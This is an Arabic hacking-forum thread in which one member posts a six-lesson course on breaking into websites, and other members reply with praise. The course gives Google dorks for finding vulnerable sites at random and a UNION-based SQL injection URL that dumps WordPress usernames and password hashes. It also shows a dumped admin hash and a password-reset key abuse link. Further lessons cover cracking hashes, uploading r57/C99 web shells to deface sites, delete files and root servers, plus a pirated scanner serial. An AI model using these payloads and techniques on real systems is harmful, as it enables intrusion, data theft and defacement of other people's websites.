1. X-mohamed

    X-mohamed Developer

    الأنتساب:
    ‏23 سبتمبر 2014
    المشاركات:
    43
    الإعجابات المتلقاة:
    1
    نقاط الجائزة:
    8
    [​IMG]
    اهلا و سهلا بالاعضاء و زوار و المشرفين ...الخ !
    [​IMG]
    في موضوع جديد ان شاء الله ينال اعجابكم و رضاكم

    دورة اختراق المواقع || Cloudx

    الدرس ( الاول ) :

    العنوان : اساسيات ومفاهيم

    الفديو :

    [YOUTUBE]2JH-Ww6Glio[/YOUTUBE]

    +++++++++++++++
    ++ مصطلحات ومعاني ++
    +++++++++++++++

    1- الثغرات EX. SQL-Injection , UploadShell , Xss , LFI , RFI

    ------------------
    2- Dork - Add to Google -
    ------------------
    3- Exploit الاستغلال
    ------------------
    4- Shell EX. C99.php , r57.php , webadmin.php
    ------------------ (2)
    +++++++++++++
    ++ انواع الاختراق ++
    +++++++++++++
    1- اختراق كامل - Root -
    ------------------
    2- اختراق جزئي - Index -
    الموقع اللي رفعنا عليه الشيل فقط
    ------------------
    3- سحب الداتا بيس فقط - SQL Database -
    ------------------
    4- رفع ملفات مثل .txt .html - Windows -
    ------------------
    [​IMG]
    الدرس ( الثاني ) :
    العنوان : الحماية الشخصية + استغلال الثغرات

    [YOUTUBE]275N-ul4M9U[/YOUTUBE]

    ++++++++++++
    ++ الحماية الذاتية ++
    ++++++++++++

    (*) تغيير الايبي : VPN : You're invited to join Kepard!

    (*) المعلومات الشخصية : index,cookies

    (*) حماية الجهاز (2)

    ++++++++++++++++++++++++++++++++++++++
    ++ الاختراق العشوائي واستغلال الثغرات ++
    ++++++++++++++++++++++++++++++++++++++

    (*) البحث عن الثغرة : 1337Day Agreement - 1337day Inj3ct0r Exploit Database : vulnerability : 0day : new exploits : buy and sell private exploit : shellcode by Inj3ct0r Team

    (*) البحث عن المواقع المصابة : google.com , bing.com

    (*) استغلال الثغرة

    بيانات الثغرة :

    كود PHP:
    Dork:inurl:"index.php?option=com_ac*lassif"
    Exploit: /index.php?option=com_aclassif&optio*n=com_aclassif&ct=wlkm_repl&md=a*dd_form&replid=917&fblg=1
    [​IMG]
    الدرس ( الثالث ) :

    العنوان : شرح خصائص الشيل + تعليق الــ(.htaccess)

    [YOUTUBE]4qGX5C35Cwo[/YOUTUBE]

    تكملة دورة اختراق المواقع الدرس (الثالث)
    ============================
    العنوان : شرح خصائص الشيل + تعليق الــ
    (.htaccess)
    نوع الشيل : r57.php
    ==============================
    اهم استعمالات الشيل :

    1- حذف ملفات الموقع
    2- تغيير او رفع اندكس الاختراق
    3- قرائة الكونفنق بسهولة
    4- رفع ملفات سحب الروت والاتصال بالباك دور
    5- قرائة واختراق المواقع الموجودة على نفس اليوزر
    6- رفع الملفات المضغوطة وفك الضغط

    ================================
    ؟(.htaccess) ماهو الـ
    [​IMG]
    الدرس ( الرابع ) :

    العنوان : شرح البحث عن الثغرات واستغلالها

    [YOUTUBE]i8DVX-gobdM[/YOUTUBE]

    تكملة دورة اختراق المواقع الدرس (الرابع)

    =========================

    العنوان : شرح البحث عن الثغرات واستغلالها

    الموقع المستخدم في البحث :

    Search in World Laboratory of Bugtraq 2 - CXSecurity.com

    wordpress sql

    =========================

    كود PHP:
    Dork inurl:wp-content/plugins/player/settings*.php?playlist=
    Exploit:

    كود PHP:
    /wp-content/plugins/player/settings.php?*playlist=2&theme=-1+union+select+1,2*,3,group_concat(user_login,0x3a,user_pas*s),5,6,7,8,9,10,11,12,13,14,15,16,17,18,*19,20,21,22,23,24,25,26,27,28,29,30,31,3*2,33,34,35,3
    6
    ,37,38,39,40,41,42,43,44,45,46,47,48,49*,50,51,52+from+wp_users--
    ==========================
    شرح الحقن اليدوي بإحتراف

    AdF.ly - shrink your URLs and get paid!

    الناتج:
    كود PHP:
    admin:$P$BCiXop6d/nqApOGnVb8/.fWp3XVEGi1
    =========================

    شرح تخطي هاش Wordpress ورفع الشيل

    AdF.ly - shrink your URLs and get paid!

    =========================

    كود PHP:
    user_email bmdennis@gmail.com
    user_login 
    admin
    user_activation_key 
    UEbpcjtSy1sOIQKZh6e1
    wp
    -login.php?action=rp&key=UEbpcjtSy*1sOIQKZh6e1&login=admin
    [​IMG]
    الدرس (الخامس) :

    العنوان : شرح التعامل مع الهاشات وكسرها

    تكملة دورة اختراق المواقع الدرس (الخامس)
    =========================

    العناون : ( الهاش ) وشرح
    التعامل معه وكسره

    -------------------------

    الادوات المستعملة في الشرح :

    1- Hash-type.py hash-type.py

    2- HashCat

    -------------------------
    الاشياء المطلوبة :

    1- OS: Windows Only

    2- dotNET Framework v4 AdF.ly - shrink your URLs and get paid!

    3- hashcat 0.43

    4- oclhashcat-plus 0.14

    5- oclhashcat-lite 0.15 AdF.ly - shrink your URLs and get paid!

    -------------------------
    6- مترجم بايثون python-2.5.2.msi

    7- Wordlist AdF.ly - shrink your URLs and get paid!

    =========================
    كود PHP:
    221f244861e476d0
    d59084b66e167f13bef93b1a5d07acd2
    ============
    [​IMG]
    الدرس (السادس) :

    العنوان : فحص المواقع المستهدفة وبداية الاستهداف

    [YOUTUBE]ohleMWv219M[/YOUTUBE]

    | العنوان : فحص المواقع المستهدفة |

    =================================

    الادوات المستعملة في الشرح :

    1- (WVS) Acunetix Web Vulnerability Scanner 8 Build + Patch
    Acunetix Web Vulnerability Scanner 8 Build + Patch.rar 17.5 mb

    --------------------------
    2- Netsparker + serial

    Serial : 408B7320AE4320E34F7C

    AdF.ly - shrink your URLs and get paid! 23.6 mb
    --------------------------
    Both :

    Cloudx ط§ط¯ظˆط§طھ ط´ط±ط­ 6.rar

    41 mb

    الاداة من برمجتي لتخمين على الوورد بريس :

    Wp_Brute_Cloudx

    ===========================

    اهم استخدامات البرنامجين :

    1- الكشف عن الثغرات

    2- شرح عن الثغرات المكتشفة

    3- ايجاد لوحة التحكم

    4- معرفة اضافات الموقع

    5- درجة قوة الموقع

    6- معلومات عن الاستضافة

    في امان الله وحفظه
     
    1 person likes this.
  2. Murtadha Albejawe

    Murtadha Albejawe Developer

    الأنتساب:
    ‏28 يوليو 2012
    المشاركات:
    78
    الإعجابات المتلقاة:
    3
    نقاط الجائزة:
    8
    الإقامة:
    $$$
    رد: دورة اختراق المواقع مقدمة - Cloudx

    جزاك الله خيرآ حبيبي
    موضوع رائع &:":​
     
  3. الہٰانونيٰموسہٰ رضاويٰ

    الہٰانونيٰموسہٰ رضاويٰ Developer

    الأنتساب:
    ‏17 يونيو 2015
    المشاركات:
    80
    الإعجابات المتلقاة:
    5
    نقاط الجائزة:
    8
    الوظيفة:
    دائرة كاتب عدل
    الإقامة:
    شعلة الصدرين
    رد: دورة اختراق المواقع مقدمة - Cloudx

    بطل عاشت ايدك
     
  4. ذكـرتـك ، إلبلـوي

    ذكـرتـك ، إلبلـوي Developer

    الأنتساب:
    ‏17 ديسمبر 2011
    المشاركات:
    20
    الإعجابات المتلقاة:
    0
    نقاط الجائزة:
    1
    الإقامة:
    explorer.ExE
    المخالفات
    3
    رد: دورة اختراق المواقع مقدمة - Cloudx

    يعطيكًـ العإفية
     
  5. k!lwa s&rian ro0t

    k!lwa s&rian ro0t مراقب عآم

    الأنتساب:
    ‏3 أغسطس 2014
    المشاركات:
    742
    الإعجابات المتلقاة:
    1,233
    نقاط الجائزة:
    93
    الجنس:
    ذكر
    رد: دورة اختراق المواقع مقدمة - Cloudx

    مشكور عالطرح الجميل حبيبي بارك الله فيك :$
     
  6. Wolf Hex

    Wolf Hex DeveloPer Plus

    الأنتساب:
    ‏24 فبراير 2015
    المشاركات:
    264
    الإعجابات المتلقاة:
    1
    نقاط الجائزة:
    18
    الوظيفة:
    Student
    الإقامة:
    دولة أمير المؤمنين (ع)
    رد: دورة اختراق المواقع مقدمة - Cloudx

    ماشاء الله
    يعطيك العافيه صديقي
    بارك الله فيك
     
  7. Ali raad

    Ali raad عٍشْقْتْهٌاٌ بّـصٍـمِـ مشرف

    الأنتساب:
    ‏21 فبراير 2015
    المشاركات:
    395
    الإعجابات المتلقاة:
    767
    نقاط الجائزة:
    93
    الجنس:
    ذكر
    الوظيفة:
    طًاٌلِـبّـ
    الإقامة:
    اٌلِـعٍرُاٌقْ - بّـاٌبّـلِـ
    رد: دورة اختراق المواقع مقدمة - Cloudx

    وعليكم السلام تسلم حبيبي :{1!}:
     
  8. Ali raad

    Ali raad عٍشْقْتْهٌاٌ بّـصٍـمِـ مشرف

    الأنتساب:
    ‏21 فبراير 2015
    المشاركات:
    395
    الإعجابات المتلقاة:
    767
    نقاط الجائزة:
    93
    الجنس:
    ذكر
    الوظيفة:
    طًاٌلِـبّـ
    الإقامة:
    اٌلِـعٍرُاٌقْ - بّـاٌبّـلِـ
    رد: دورة اختراق المواقع مقدمة - Cloudx

    ماذا تعتقد في مشاركة X-mohamed؟يعجبني ويستحق التقييم
    :

    :)
     
  9. th3 Spl0it

    th3 Spl0it Developer

    الأنتساب:
    ‏10 مارس 2015
    المشاركات:
    116
    الإعجابات المتلقاة:
    2
    نقاط الجائزة:
    18
    الإقامة:
    shad0w ~/ [#]
    رد: دورة اختراق المواقع مقدمة - Cloudx

    يعطيك العافيه دورة جميله
     
  10. GhOst Al iraqi

    GhOst Al iraqi DeveloPer Plus

    الأنتساب:
    ‏29 يوليو 2015
    المشاركات:
    98
    الإعجابات المتلقاة:
    0
    نقاط الجائزة:
    6
    رد: دورة اختراق المواقع مقدمة - Cloudx

    وعليكم السلامأستمر حبيبي , :{1!}:
     

مشاركة هذه الصفحة